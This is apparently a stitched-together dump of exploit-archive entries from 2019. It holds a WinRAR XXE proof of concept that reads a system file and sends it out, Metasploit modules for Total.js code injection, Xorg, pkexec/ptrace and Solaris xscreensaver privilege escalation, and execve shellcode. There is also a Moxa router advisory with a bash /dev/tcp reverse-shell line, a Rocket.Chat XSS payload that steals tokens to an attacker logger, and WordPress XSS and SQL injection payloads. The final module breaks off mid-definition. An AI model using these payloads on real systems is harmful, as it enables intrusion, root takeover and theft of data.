# Exploit Title: winrar External Entity Injection
# Exploit Author: albalawi-s
# Vendor Homepage: https://win-rar.com
# Software Link: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
# Version: 5.80
# Tested on: Microsoft Windows Version 10.0.18362.418 64bit

#https://twitter.com/test_app_______

#poc video 

https://www.youtube.com/watch?v=XpFvSHeVB7E

# POC
=====================================================
1- python -m SimpleHTTPServer 8000
2- open winrar or any file.rar
3- help
4- help topics
5- Drag the html file to the window


html file

<htmlL>
<body>
<xml>
<?xml version="1.0"?>
<!DOCTYPE flavios [ 
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/start.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
</body>
</html>

==============================
start.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
'Name'           => 'Total.js CMS 12 Widget JavaScript Code Injection',
'Description'    => %q{
        This module exploits a vulnerability in Total.js CMS. The issue is that a user with
        admin permission can embed a malicious JavaScript payload in a widget, which is
        evaluated server side, and gain remote code execution.
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Riccardo Krauter', # Original discovery
'sinn3r'            # Metasploit module
        ],
'Arch'           => [ARCH_X86, ARCH_X64],
'Targets'        =>
        [
          [ 'Total.js CMS on Linux', { 'Platform' => 'linux', 'CmdStagerFlavor' => 'wget'} ],
          [ 'Total.js CMS on Mac',   { 'Platform' => 'osx', 'CmdStagerFlavor' => 'curl' } ]
        ],
'References'     =>
        [
          ['CVE', '2019-15954'],
          ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/5'],
          ['URL', 'https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf']
        ],
'DefaultOptions' =>
        {
'RPORT' => 8000,
        },
'Notes'          =>
        {
'SideEffects' => [ IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ],
'Stability'   => [ CRASH_SAFE ]
        },
'Privileged'     => false,
'DisclosureDate' => '2019-08-30', # Reported to seclist
'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path for Total.js CMS', '/']),
        OptString.new('TOTALJSUSERNAME', [true, 'The username for Total.js admin', 'admin']),
        OptString.new('TOTALJSPASSWORD', [true, 'The password for Total.js admin', 'admin'])
      ])
  end

  class AdminToken
    attr_reader :token

    def initialize(cookie)
      @token = cookie.scan(/__admin=([a-zA-Z\d]+);/).flatten.first
    end

    def blank?
      token.blank?
    end
  end

  class Widget
    attr_reader :name
    attr_reader :category
    attr_reader :source_code
    attr_reader :platform
    attr_reader :url

    def initialize(p, u, stager)
      @name = "p_#{Rex::Text.rand_text_alpha(10)}"
      @category = 'content'
      @platform = p
      @url = u
      @source_code  = %Q|<script total>|
      @source_code << %Q|global.process.mainModule.require('child_process')|
      @source_code << %Q|.exec("sleep 2;#{stager}");|
      @source_code << %Q|</script>|
    end
  end

  def check
    code = CheckCode::Safe

    res = send_request_cgi({
'method' => 'GET',
'uri'    => normalize_uri(target_uri.path, 'admin', 'widgets')
    })

    unless res
      vprint_error('Connection timed out')
      return CheckCode::Unknown
    end

    # If the admin's login page is visited too many times, we will start getting
    # a 401 (unauthorized response). In that case, we only have a header to work
    # with.
    if res.headers['X-Powered-By'].to_s == 'Total.js'
      code = CheckCode::Detected
    end

    # If we are here, then that means we can still see the login page.
    # Let's see if we can extract a version.
    html = res.get_html_document
    element = html.at('title')
    return code unless element.respond_to?(:text)
    title = element.text.scan(/CMS v([\d\.]+)/).flatten.first
    return code unless title
    version = Gem::Version.new(title)

    if version <= Gem::Version.new('12')
      # If we are able to check the version, we could try the default cred and attempt
      # to execute malicious code and see how the application responds. However, this
      # seems to a bit too aggressive so I'll leave that to the exploit part.
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  def auth(user, pass)
    json_body = { 'name' => user, 'password' => pass }.to_json

    res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'api', 'login', 'admin'),
'ctype'  => 'application/json',
'data'   => json_body
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end

    json_res = res.get_json_document
    cookies = res.get_cookies
    # If it's an array it could be an error, so we are specifically looking for a hash.
    if json_res.kind_of?(Hash) && json_res['success']
      token = AdminToken.new(cookies)
      @admin_token = token
      return token
    end
    fail_with(Failure::NoAccess, 'Invalid username or password')
  end

  def create_widget(admin_token)
    platform = target.platform.names.first
    host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket::source_address : datastore['SRVHOST']
    port = datastore['SRVPORT']
    proto = datastore['SSL'] ? 'https' : 'http'
    payload_name = "p_#{Rex::Text.rand_text_alpha(5)}"
    url = "#{proto}://#{host}:#{port}#{get_resource}/#{payload_name}"
    widget = Widget.new(platform, url, generate_cmdstager(
'Path' => "#{get_resource}/#{payload_name}",
'temp' => '/tmp',
'file' => payload_name
      ).join(';'))

    json_body = {
'name'     => widget.name,
'category' => widget.category,
'body'     => widget.source_code
    }.to_json

    res = send_request_cgi({
'method' => 'POST',
'uri'    => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
'cookie' => "__admin=#{admin_token.token}",
'ctype'  => 'application/json',
'data'   => json_body
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end

    res_json = res.get_json_document
    if res_json.kind_of?(Hash) && res_json['success']
      print_good("Widget created successfully")
    else
      fail_with(Failure::Unknown, 'No success message in body')
    end

    widget
  end

  def get_widget_item(admin_token, widget)
    res = send_request_cgi({
'method' => 'GET',
'uri'    => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
'cookie' => "__admin=#{admin_token.token}",
'ctype'  => 'application/json'
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end

    res_json = res.get_json_document
    count = res_json['count']
    items = res_json['items']

    unless count
      fail_with(Failure::Unknown, 'No count key found in body')
    end

    unless items
      fail_with(Failure::Unknown, 'No items key found in body')
    end

    items.each do |item|
      widget_name = item['name']
      if widget_name.match(/p_/)
        return item
      end
    end

    []
  end

  def clear_widget
    admin_token = get_admin_token
    widget = get_widget

    print_status('Finding the payload from the widget list...')
    item = get_widget_item(admin_token, widget)

    json_body = {
'id'          => item['id'],
'picture'     => item['picture'],
'name'        => item['name'],
'icon'        => item['icon'],
'category'    => item['category'],
'datecreated' => item['datecreated'],
'reference'   => item['reference']
    }.to_json

    res = send_request_cgi({
'method' => 'DELETE',
'uri'    => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
'cookie' => "__admin=#{admin_token.token}",
'ctype'  => 'application/json',
'data'   => json_body
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end

    res_json = res.get_json_document
    if res_json.kind_of?(Hash) && res_json['success']
      print_good("Widget cleared successfully")
    else
      fail_with(Failure::Unknown, 'No success message in body')
    end
  end

  def on_request_uri(cli, req)
    print_status("#{cli.peerhost} requesting: #{req.uri}")

    if req.uri =~ /p_.+/
      payload_exe = generate_payload_exe(code: payload.encoded)
      print_status("Sending payload to #{cli.peerhost}")
      send_response(cli, payload_exe, {'Content-Type' => 'application/octet-stream'})
      return
    end

    send_not_found(cli)
  end

  def on_new_session(session)
    clear_widget
  end

  # This is kind of for cleaning up the wiget, because we cannot pass it as an
  # argument in on_new_session.
  def get_widget
    @widget
  end

  # This is also kind of for cleaning up widget, because we cannot pass it as an
  # argument directly
  def get_admin_token
    @admin_token
  end

  def exploit
    user = datastore['TOTALJSUSERNAME']
    pass = datastore['TOTALJSPASSWORD']
    print_status("Attempting to authenticate with #{user}:#{pass}")
    admin_token = auth(user, pass)
    fail_with(Failure::Unknown, 'No admin token found') if admin_token.blank?
    print_good("Authenticatd as: #{user}:#{pass}")
    print_status("Creating a widget...")
    @widget = create_widget(admin_token)
    super
  end

end

# Exploit Name: Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)
# Author : WangYihang
# Date: 2019-10-22
# Tested on: Linux_x86
# Shellcode Length: 42
# CVE: N/A
;================================================================================
# Shellcode :
char shellcode[] = "\x31\xdb\xb3\x03\x31\xc9\xb1\x03\xfe\xc9\x31\xc0\xb0\x3f\xcd\x80\x80\xf9\xff\x75\xf3\x31\xc9\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
;================================================================================
# Python :
shellcode = "\x31\xdb\xb3\x03\x31\xc9\xb1\x03\xfe\xc9\x31\xc0\xb0\x3f\xcd\x80\x80\xf9\xff\x75\xf3\x31\xc9\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
;================================================================================
; Build :
; $ nasm -f elf32 shellcode.asm -o shellcode
; $ objdump -d shellcode

; shellcode:     file format elf32-i386


; Disassembly of section .text:

; 00000000 <_start>:
;    0: 31 db                 xor    %ebx,%ebx
;    2: b3 03                 mov    $0x3,%bl
;    4: 31 c9                 xor    %ecx,%ecx
;    6: b1 03                 mov    $0x3,%cl

; 00000008 <dup2>:
;    8: fe c9                 dec    %cl
;    a: 31 c0                 xor    %eax,%eax
;    c: b0 3f                 mov    $0x3f,%al
;    e: cd 80                 int    $0x80
;   10: 80 f9 ff             cmp    $0xff,%cl
;   13: 75 f3                 jne    8 <dup2>

; 00000015 <execve>:
;   15: 31 c9                 xor    %ecx,%ecx
;   17: 6a 0b                 push   $0xb
;   19: 58                   pop    %eax
;   1a: 99                   cltd  
;   1b: 52                   push   %edx
;   1c: 68 2f 2f 73 68       push   $0x68732f2f
;   21: 68 2f 62 69 6e       push   $0x6e69622f
;   26: 89 e3                 mov    %esp,%ebx
;   28: cd 80                 int    $0x80

;================================================================================
; Assembly language source code :
; shellcode.asm
;global _start
;    _start:
;        set ebx to the old socket fd = 3
;        xor ebx, ebx
;        mov bl, 03H
;
;        init new socket fd
;        xor ecx, ecx
;        mov cl, 3
;
;        dup2(socket, stdin)
;        dup2(socket, stdout)
;        dup2(socket, stderr)
;        dup2:
;            dec cl
;            xor eax, eax
;            mov al, 3FH
;            int 80H
;            cmp cl, 0FFH
;            jne dup2
;
;        execve:
;            execve("/bin/sh", "/bin/sh", 0)
;            xor ecx, ecx
;            push 0bH
;            pop eax
;            cdq
;            push edx
;            push "//sh"
;            push "/bin"
;            mov ebx, esp
;            int 80H

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::Kernel
  include Msf::Post::Linux::System


  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Xorg X11 Server SUID modulepath Privilege Escalation',
'Description'    => %q{
        This module attempts to gain root privileges with SUID Xorg X11 server
        versions 1.19.0 < 1.20.3.

        A permission check flaw exists for -modulepath and -logfile options when
        starting Xorg.  This allows unprivileged users that can start the server
        the ability to elevate privileges and run arbitrary code under root
        privileges.

        This module has been tested with CentOS 7 (1708).
        CentOS default install will require console auth for the users session.
        Xorg must have SUID permissions and may not start if running.

        On successful exploitation artifacts will be created consistant
        with starting Xorg.
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Narendra Shinde', # Discovery and exploit
'Aaron Ringo',     # Metasploit module
        ],
'DisclosureDate' => 'Oct 25 2018',
'References'     =>
        [
           [ 'CVE', '2018-14665' ],
           [ 'BID', '105741' ],
           [ 'EDB', '45697' ],
           [ 'EDB', '45742' ],
           [ 'EDB', '45832' ],
           [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html' ]
        ],
'Platform'       =>  %w[linux unix solaris],
'Arch'           =>  [ARCH_X86, ARCH_X64],
'SessionTypes'   =>  %w[shell meterpreter],
'Targets'        =>
        [
           ['Linux x64', {
'Platform' => 'linux',
'Arch' => ARCH_X64 } ],
           ['Linux x86', {
'Platform' => 'linux',
'Arch' => ARCH_X86 } ],
           ['Solaris x86', {
'Platform' => [ 'solaris', 'unix' ],
'Arch' => ARCH_SPARC } ],
           ['Solaris x64', {
'Platform' => [ 'solaris', 'unix' ],
'Arch' => ARCH_SPARC } ],
        ],
'DefaultTarget'  => 0))

     register_advanced_options(
       [
         OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
         OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),
         OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]),
         OptString.new('sofile', [ true, 'Xorg shared object name for modulepath', 'libglx.so' ])
       ]
     )
  end


  def check
    # linux checks
    uname = cmd_exec "uname"
    if uname =~ /linux/i
      vprint_status "Running additional check for Linux"
      if datastore['ConsoleLock']
        user = cmd_exec "id -un"
        unless exist? "/var/run/console/#{user}"
          vprint_error "No console lock for #{user}"
          return CheckCode::Safe
        end
        vprint_good "Console lock for #{user}"
      end
    end

    # suid program check
    xorg_path = cmd_exec "command -v Xorg"
    unless xorg_path.include?("Xorg")
      vprint_error "Could not find Xorg executable"
      return CheckCode::Safe
    end
    vprint_good "Xorg path found at #{xorg_path}"
    unless setuid? xorg_path
      vprint_error "Xorg binary #{xorg_path} is not SUID"
      return CheckCode::Safe
    end
    vprint_good "Xorg binary #{xorg_path} is SUID"

    x_version = cmd_exec "Xorg -version"
    if x_version.include?("Release Date")
      v = Gem::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
      unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))
        vprint_error "Xorg version #{v} not supported"
        return CheckCode::Safe
      end
    elsif x_version.include?("Fatal server error")
      vprint_error "User probably does not have console auth"
      vprint_error "Below is Xorg -version output"
      vprint_error x_version
      return CheckCode::Safe
    else
      vprint_warning "Could not parse Xorg -version output"
      return CheckCode::Appears
    end
    vprint_good "Xorg version #{v} is vulnerable"

    # process check for /X
    proc_list = cmd_exec "ps ax"
    if proc_list.include?('/X ')
      vprint_warning('Xorg in process list')
      return CheckCode::Appears
    end
    vprint_good('Xorg does not appear to be running')
    return CheckCode::Vulnerable
  end

  def check_arch_and_compile(path, data)
    cpu = ''
    if target['Arch'] == ARCH_X86
      cpu = Metasm::Ia32.new
      compile_with_metasm(cpu, path, data)
    elsif target['Arch'] == ARCH_SPARC
      compile_with_gcc(path, data)
    else
      cpu = Metasm::X86_64.new
      compile_with_metasm(cpu, path, data)
    end
  end

  def compile_with_metasm(cpu, path, data)
    shared_obj = Metasm::ELF.compile_c(cpu, data).encode_string(:lib)
    write_file(path, shared_obj)
    register_file_for_cleanup path

    chmod path
  rescue
    print_status('Failed to compile with Metasm. Falling back to compiling with GCC.')
    compile_with_gcc(path, data)
  end

  def compile_with_gcc(path, data)
    unless has_gcc?
      fail_with Failure::BadConfig, 'gcc is not installed'
    end
    vprint_good 'gcc is installed'

    src_path = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(6..10)}.c"
    write_file(src_path, data)

    gcc_cmd = "gcc -fPIC -shared -o #{path} #{src_path} -nostartfiles"
    if session.type.eql? 'shell'
      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
    end
    output = cmd_exec gcc_cmd
    register_file_for_cleanup src_path
    register_file_for_cleanup path

    unless output.blank?
      print_error output
      fail_with Failure::Unknown, "#{src_path} failed to compile"
    end

    chmod path
  end

  def exploit
    check_status = check
    if check_status == CheckCode::Appears
      print_warning 'Could not get version or Xorg process possibly running, may fail'
    elsif check_status ==  CheckCode::Safe
      fail_with Failure::NotVulnerable, 'Target not vulnerable'
    end

    if is_root?
      fail_with Failure::BadConfig, 'This session already has root privileges'
    end

    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end

    print_good 'Passed all initial checks for exploit'

    modulepath = datastore['WritableDir']
    sofile = "#{modulepath}/#{datastore['sofile']}"
    pscript = "#{modulepath}/.session-#{rand_text_alphanumeric 5..10}"
    xdisplay = datastore['Xdisplay']

    stub = %Q^
extern int setuid(int);
extern int setgid(int);
extern int system(const char *__s);

void _init(void) __attribute__((constructor));

void __attribute__((constructor))  _init() {
setgid(0);
setuid(0);
system("#{pscript} &");
  }
    ^
    print_status 'Writing launcher and compiling'
    check_arch_and_compile(sofile, stub)

    # Uploading
    print_status 'Uploading your payload, this could take a while'
    if payload.arch.first == 'cmd'
      write_file(pscript, payload.encoded)
    else
      write_file(pscript, generate_payload_exe)
    end
    chmod pscript
    register_file_for_cleanup pscript


    # Actual exploit with cron overwrite
    print_status 'Exploiting'
    #Xorg -logfile derp -modulepath ',/tmp' :1
    xorg_cmd = "Xorg -modulepath ',#{modulepath}' #{xdisplay} & >/dev/null"
    cmd_exec xorg_cmd
    Rex.sleep 7
    cmd_exec "pkill Xorg"
    Rex.sleep 1
  end
end

During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. And the other one is an improper access control found on the web server allowing to retrieve log files. 

As usual, we reported those issues directly to Moxa and ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) in order to “responsible disclose†them. 

The ICS-CERT advisory was published on their website and a new EDR-810 firmware was provided by Moxa. 

Many thanks to Moxa and ICS-CERT teams for their help.



Advisory

The following two product vulnerabilities were identified in Moxa’s EDR-810 Series Secure Routers, all versions 5.1 and prior are vulnerable:

CVE-2019-10969: An exploitable command injection vulnerability exists in the CLI functionality, which is provided by the Telnet and SSH services. An authenticated attacker (with admin or configadmin privileges) can abuse the ping feature to execute commands on the router. As the CLI is executed with root privileges, it is possible to obtain a root shell on the device. A CVSS v3 base score of 7.2 has been calculated.
CVE-2019-10963: An unauthenticated attacker can retrieve all the log files (Firewall, IPSec and System) from the webserver. In order to exploit the issue, a legitimate user had to export the log files previously. A CVSS v3 base score of 4.3 has been calculated.


Exploitation

CVE-2019-10969 - Ping Command Injection

The Telnet and SSH services provide a Command Line Interface (CLI), which is a restricted shell allowing to perform a subset of actions on the device. The ping function of the CLI is vulnerable to command injection. It is possible to specify a specific hostname, such as ($/bin/bash), in order to obtain a shell as shown below: 

Ping command injection

Due to limitations on the CLI, it is not possible to use the shell as is. The attacker can use a reverse shell as shown below:
bash -i >& /dev/tcp/YOUR_IP_ADDRESS/1234 0>&1


CVE-2019-10963 - Missing Access Control On Log Files

When a legitimate user (admin or configadmin for instance) export the logs files from the MOXA router. The files are stored at the root of the webserver, as follow:

http://IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz
An attacker can retrieve this archive without being authenticated on the Web interface as shown below:

# wget http://192.168.0.1/MOXA_All_LOG.tar.gz
--2019-02-13 17:35:19--  http://192.168.0.1/MOXA_All_LOG.tar.gz
Connexion à 192.168.0.1:80... connecté.
requête HTTP transmise, en attente de la réponse... 200 OK
Taille : 15724 (15K) [text/plain]
Sauvegarde en : " MOXA_All_LOG.tar.gz "

MOXA_All_LOG.tar.gz                                       100%[====================================================================================================================================>]  15,36K  --.-KB/s    ds 0s      

2019-02-13 17:35:19 (152 MB/s) - " MOXA_All_LOG.tar.gz " sauvegardé [15724/15724]

# tar ztvf MOXA_All_LOG.tar.gz 
drwxr-xr-x admin/root        0 2019-02-13 11:55 moxa_log_all/
-rw-r--r-- admin/root   326899 2019-02-13 11:55 moxa_log_all/MOXA_Firewall_LOG.ini
-rw-r--r-- admin/root      156 2019-02-13 11:55 moxa_log_all/MOXA_IPSec_LOG.ini
-rw-r--r-- admin/root    68465 2019-02-13 11:55 moxa_log_all/MOXA_LOG.ini


Mitigation

It is recommended to install at least the firmware version 5.3 from Moxa website.



Timeline

2019-02-24: Vendor Disclosure
2019-02-24: Advisory sent to ICS-CERT
2019-09-30: Advisory published by Moxa
2019-10-01: Advisory published by ICS-CERT

# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat < 2.1.0
# CVE: CVE-2019-17220
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)

# PoC
# 1. Create l33t.php on a web server

<?php
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

# 2. Open a chat session
# 3. Send payload with your web server url

![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

# 4. Token will be written in logs.txt when target seen your message.

# Title: IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path
# Author: Sainadh Jamalpur
# Date: 2019-10-22
# Vendor Homepage: https://www.iobit.com
# Software Link: https://www.iobit.com/en/advanceduninstaller.php
# Version : 9.1.0.8
# Tested on: Windows 10 64bit(EN)
# CVE : N/A

# 1. Description:
# Unquoted service paths in IObit Uninstaller v9.1.0.8 have an unquoted service path.

# PoC
===========
C:\>sc qc IObitUnSvr
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: IObitUnSvr
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : IObit Uninstaller Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>

#Exploit:
============
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

# Exploit Title: Wordpress Sliced Invoices <= 3.8.2 Authentificated Reflected XSS Vulnerability
# Date: 22-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://slicedinvoices.com/
# Software Link: https://wordpress.org/plugins/sliced-invoices/
# Version: 3.8.2
# Tested on: Ubuntu 18.04 / Wordpress 5.3

1. Description:  

Wordpress Sliced Invoices plugin with version lower then 3.8.2 is affected by an authentificated Reflected Cross-site scripting (XSS) vulnerability.

2. Proof of Concept: 

Reflected Cross-site scripting (XSS)
- Using an Wordpress user, access < your_target > /wp-admin/admin.php?action=duplicate_quote_invoice&post=%3Cscript%3Ealert(1)%3C%2fscript%3E
- The response will contain:
```
<body id="error-page">
<p>Creation failed, could not find original invoice or quote: <script>alert(1)</script></p></body>
</html>
```

# Exploit Title: Wordpress Sliced Invoices <= 3.8.2 Authenticated SQL Injection Vulnerability
# Date: 22-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://slicedinvoices.com/
# Software Link: https://wordpress.org/plugins/sliced-invoices/
# Version: 3.8.2
# Tested on: Ubuntu 18.04 / Wordpress 5.3

1. Description:  

Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected by an Authenticated SQL Injection vulnerability.

2. Proof of Concept: 

Authenticated SQL Injection:
- Using an Wordpress user, access <your target> /wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20
- The response will be returned after 20 seconds proving the successful exploitation of the vulnerability.
- Sqlmap can be used to further exploit the vulnerability.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::Kernel
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
'Name'          => 'Linux Polkit pkexec helper PTRACE_TRACEME local root exploit',
'Description'   => %q{
          This module exploits an issue in ptrace_link in kernel/ptrace.c before Linux
          kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but
          not over an SSH session, as it requires execution from within the context of
          a user with an active Polkit agent.
          In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles
          the recording of the credentials of a process that wants to create a ptrace
          relationship, which allows local users to obtain root access by leveraging
          certain scenarios with a parent-child process relationship, where a parent drops
          privileges and calls execve (potentially allowing control by an attacker). One
          contributing factor is an object lifetime issue (which can also cause a panic).
          Another contributing factor is incorrect marking of a ptrace relationship as
          privileged, which is exploitable through (for example) Polkit's pkexec helper
          with PTRACE_TRACEME.
      },
'License'       => MSF_LICENSE,
'Author'        => [
'Jann Horn',    # Discovery and exploit
'bcoles',       # Metasploit module
'timwr',        # Metasploit module
      ],
'References'     => [
          ['CVE', '2019-13272'],
          ['EDB', '47133'],
          ['PACKETSTORM', '153663'],
          ['URL', 'https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272'],
          ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1903'],
      ],
'SessionTypes'   => [ 'shell', 'meterpreter' ],
'Platform'       => [ 'linux' ],
'Arch'           => [ ARCH_X64 ],
'Targets'        => [[ 'Auto', {} ]],
'DefaultOptions' =>
        {
'Payload'     => 'linux/x64/meterpreter/reverse_tcp',
'PrependFork' => true,
        },
'DisclosureDate' => 'Jul 4 2019'))
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  def check
    # Introduced in 4.10, but also backported
    # Patched in 4.4.185, 4.9.185, 4.14.133, 4.19.58, 5.1.17
    release = kernel_release
    v = Gem::Version.new release.split('-').first

    if v >= Gem::Version.new('5.1.17') || v < Gem::Version.new('3')
      vprint_error "Kernel version #{release} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "Kernel version #{release} appears to be vulnerable"

    unless command_exists? 'pkexec'
      vprint_error 'pkexec is not installed'
      return CheckCode::Safe
    end
    vprint_good 'pkexec is installed'

    arch = kernel_hardware
    unless arch.include? 'x86_64'
      vprint_error "System architecture #{arch} is not supported"
      return CheckCode::Safe
    end
    vprint_good "System architecture #{arch} is supported"

    loginctl_output = cmd_exec('loginctl --no-ask-password show-session "$XDG_SESSION_ID" | grep Remote')
    if loginctl_output =~ /Remote=yes/
      print_warning 'This is exploit requires a valid policykit session (it cannot be executed over ssh)'
      return CheckCode::Safe
    end

    CheckCode::Appears
  end

  def exploit
    if is_root? && !datastore['ForceExploit']
      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
    end

    unless check == CheckCode::Appears
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end

    payload_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
    upload_and_chmodx(payload_file, generate_payload_exe)
    register_file_for_cleanup(payload_file)

    exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      upload_and_compile exploit_file, exploit_data('CVE-2019-13272', 'poc.c')
    else
      vprint_status 'Dropping pre-compiled exploit on system...'
      upload_and_chmodx exploit_file, exploit_data('CVE-2019-13272', 'exploit')
    end
    register_file_for_cleanup(exploit_file)

    print_status("Executing exploit '#{exploit_file}'")
    result = cmd_exec("echo #{payload_file} | #{exploit_file}")
    print_status("Exploit result:\n#{result}")
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Solaris::Priv
  include Msf::Post::Solaris::System
  include Msf::Post::Solaris::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Solaris xscreensaver log Privilege Escalation',
'Description'    => %q{
        This module exploits a vulnerability in `xscreensaver` versions
        since 5.06 on unpatched Solaris 11 systems which allows users
        to gain root privileges.

        `xscreensaver` allows users to create a user-owned file at any
        location on the filesystem using the `-log` command line argument
        introduced in version 5.06.

        This module uses `xscreensaver` to create a log file in `/usr/lib/secure/`,
        overwrites the log file with a shared object, and executes the shared
        object using the `LD_PRELOAD` environment variable.

        This module has been tested successfully on:

        xscreensaver version 5.15 on Solaris 11.1 (x86); and
        xscreensaver version 5.15 on Solaris 11.3 (x86).
      },
'References'     =>
        [
          ['CVE', '2019-3010'],
          ['EDB', '47509'],
          ['URL', 'https://seclists.org/fulldisclosure/2019/Oct/39'],
          ['URL', 'https://github.com/0xdea/exploits/blob/master/solaris/raptor_xscreensaver'],
          ['URL', 'https://techblog.mediaservice.net/2019/10/local-privilege-escalation-on-solaris-11-x-via-xscreensaver/'],
          ['URL', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html']
        ],
